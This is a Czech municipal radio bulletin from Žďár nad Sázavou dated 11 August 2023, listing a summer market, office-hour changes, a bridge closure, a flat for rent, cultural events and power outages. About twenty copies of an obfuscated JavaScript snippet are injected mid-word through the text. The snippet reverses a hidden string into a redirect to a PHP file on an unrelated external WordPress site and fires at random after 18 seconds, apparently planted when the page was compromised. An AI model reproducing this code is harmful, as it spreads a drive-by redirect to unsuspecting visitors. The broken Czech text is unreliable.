Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 11. srpna 2023

Pátek, 11. srpna 2023

Z ÚŘADU:

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou zve na tradiční Letní prázdninový trh, který se koná ve čtvrtek 17. srpna 2023 od 8:00 do 18:00 hodin na náměstí Republiky. K dostání bude široký sortiment zboží jako oblečení, šperky, hračky, koření a dekorace do domácnosti. Všichni občané jsou srdečně zváni. 

Městský úřad odbor stavební a územního plánování informuje o změně provozní doby pro veřejnost z důvodu přetížení. Od srpna 2023 je pro veřejnost otevřeno od pondělí do středy v dosavadních hodinách, ve čtvrtek a v pátek zůstane zavřeno. Více informací naleznete na webu města a na Facebooku. Děkujeme za pochopení. 

Upozorňujeme držitele psů, že se blíží splatnost poplatku za 2. pololetí le$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošního roku, který je nutné uhradit do 31. srpna 2023. Bližší informace podá Miroslava Zachová na tel. čísle 566 688 147. Děkujeme za včasnou úhradu poplatku. 

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou informuje o uzavření mostu na Strojírenské ulici pro mo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torovou dopravu. Chodci projdou po celou dobu stavby. Ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovo by mělo být na konci lis$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu. Více informací najdete na webu SAARPLAN nebo na Facebooku města.

Městský úřad odbor komunálních služeb oznamuje, že v souvislosti s úplnou uzavírkou části ulice Strojírenská došlo (do 31. října 2023) ke zrušení zastávky MHD Strojírenská u mostu pro všechny linky. Náhradní zastávka jsou Dagmarky. Děkujeme za pochopení

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány mobilní telefony. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

VYHLÁŠENÉ ZÁMĚRY:

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou vyhlásilo záměr na pronájem bytu na ulici Revoluční, č. p. 1829, č. or. 27, byt č. 9. Velikost bytu je 1+1. Základní nájemné činí 1 829,- Kč/ měsíc. Uzávěrka záměru je 24. srpna 2023 ve 12:00 hodin. Písemné přihlášky na vyhlášený záměr přijímá sekretariát starosty v zalepených obálkách výrazně označených „Výběrové řízení na byt“ s uvedením jména a adresy zájemce, nejpozději do termínu uzávěrky včetně. 

KULTURNÍ POZVÁNKY:

Měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Žďár nad Sázavou pořádá v rámci projektu Aktivně pro Žďár letní cvičení na Farčatech. Program nabízí tancování s Džamilou, cvičení se Zuzkou a jógu s Idou, Janou a Radkou. Nově je v nabídce i cvičení pro rodiče s dětmi od 2 let. Přesné termíny a další informace najdete na Facebooku a webu města.

Věž kostela svatého Prokopa je veřejnosti otevřená do 30. září 2023 každý den mimo pondělí a deštivého počasí. Vstupné činí 40 a 20 korun. Více informací najdete na webu www.muzeumzdar.cz

Regionální muzeum zve na speciální prázdninové workshopy pro děti. Uskuteční se každé úterý a středu od 10.00 do 11.30 hodin. Tématy budou Kouzlo objevování a Výprava do středověku. Mís$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na workshopech je nutné si předem rezervovat na čísle 736 776 840. Více informací najdete na webu www.muzeumzdar.cz

Knihovna Matěje Josefa Sychry Vás zve na výstavu Velehory a lidé v nich. Expozice velkoformá$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových panoramatických fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Jana Grubera z nepálských Himalájí a peruánských And je umístěna v Galerii u Sychry do konce srpna 2023.

Knihovna Matěje Josefa Sychry upozorňuje čtenáře na změnu půjčovní doby během prázdnin. Více informací naleznete na webových stránkách www.knihzdar.cz.

V Regionálním muzeu na Tvrzi probíhá do 27. srpna 2023 výstava Kouzlo objevování: Od hieroglyfů k Tutanchamonovi. Návštěvníci se seznámí s životem starých Egypťanů, proniknou do tajů egyptských hieroglyfů a doslova se ocitnou v hrobce faraona Tutanchamona. Více informací najdete na webu www.muzeumzdar.cz nebo na Facebooku.

VÝLUKY:

EG.D, a.s. oznamuje, že z důvodu plánovaných prací na zařízení distribuční soustavy bude přerušena dodávka elektrické energie, a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to dne 15. srpna 2023 na ul. Komenského č. 972/10 (Střední škola obchodní a služeb), č. o. 3 až 21 lichá (řada by$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových domů), řadové garáže za č. o. 8, ul. U Klafárku č. 2037/1, 1685/3 a okolí (SŠ gastronomická, Biskupské gymnázium,…), č. 2039/5 (by$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tový dům), ul. Dr. Drože. Přerušení bude probíhat od 7:30 do 12:30 hodin. 

EG.D, a.s. oznamuje, že z důvodu plánovaných prací na zařízení distribuční soustavy bude přerušena dodávka elektrické energie, a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to dne 16. srpna 2023 v areálu SPŠS a gymnázia na ul. Studentská a Neumannova (SPŠS č. 761, gymnázium č. 1693, jídelna, domov mládeže, spor$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovní hala). Přerušení bude probíhat od 7:30 do 12:30 hodin.

Vodárenská akciová společnost upozorňuje odběratele vody, že ve dnech 21.8. – 8.9.2023 proběhne pravidelné odkalování vodovodní sítě ve Žďáře nad Sázavou, během kterého může přechodně dojít ke snížení tlaku vody, popř. krátkodobému zvýšení zákalu vody.

 

KONEC HLÁŠENÍ